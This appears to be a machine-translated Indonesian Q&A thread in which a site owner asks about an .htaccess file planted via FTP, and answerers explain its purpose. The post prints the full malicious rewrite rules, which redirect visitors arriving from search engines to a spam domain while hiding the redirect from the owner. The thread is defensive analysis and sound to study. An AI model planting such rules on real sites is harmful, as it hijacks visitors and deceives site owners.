Ini diunggah ke salah satu folder FTP saya. Saya tidak terbiasa dengan Apache, tetapi masih ingin tahu - dapatkah seseorang memberi tahu saya apa jenis tindakan pengecut yang coba dilakukan oleh file ini? Terima kasih!
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*netscape.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*hotbot.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*goto.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*infoseek.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mamma.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*lycos.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mail.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ya.*$ [NC]
RewriteRule .* http://SPAMMER.info/0/go.php?sid=2 [R,L]
apache-2.2
security
mod-rewrite
.htaccess
ovinofil
sumber
sumber
.htaccess
File ditambahkan ke situs saya memiliki sekitar 40 baris kosong di bagian atas, hanya untuk membingungkan saya lebih lanjut.Jawaban:
Yang mengirim pengguna yang berasal dari mesin pencari ke situs terakhir
SPAMMER.info
(lihat riwayat pertanyaan untuk situs yang sebenarnya ).Tampaknya perujuk dalam upaya untuk bersembunyi dari Anda , karena Anda kemungkinan tidak mengakses situs melalui mesin pencari. Artinya, jika Anda langsung menuju ke URL, semuanya tampak normal. Namun, jika Anda masuk melalui mesin pencari, Anda akan dialihkan.
Catatan: ini tidak memengaruhi perayap web karena mereka ( setidaknya googlebot ) tidak menyetel tajuk pengarah.
sumber
Setiap kali pengguna dari mesin pencari halaman di situs Anda, mereka akan diarahkan ke situs spam .info.
Ini sangat licik - Anda tidak akan melihat ada masalah karena biasanya Anda cukup mengetikkan alamatnya.
sumber
untuk menambah lebih banyak - kemungkinan besar kredensial ftp Anda bocor. mungkin Anda menyimpannya di filezilla / total commander dll. ada banyak malware yang mencuri dan kemudian 'berkeliling' - masuk ke akun ftp, melampirkan javascript berbahaya ke index.php / html atau meletakkan file penulisan ulang yang serupa.
sumber